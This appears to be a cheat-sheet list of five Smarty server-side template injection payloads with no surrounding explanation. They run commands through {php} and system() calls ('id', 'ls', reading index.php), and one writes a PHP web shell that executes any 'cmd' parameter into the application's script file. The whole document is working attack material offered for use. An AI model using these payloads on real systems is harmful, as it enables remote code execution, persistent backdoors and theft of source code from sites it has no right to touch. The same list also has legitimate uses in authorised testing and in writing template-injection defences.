payload:

    1. {$smarty.version}
    2. {php}echo `id`;{/php} //deprecated in smarty v3
    3. {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
    4. {system('ls')} // compatible v3
    5. {system('cat index.php')} // compatible v3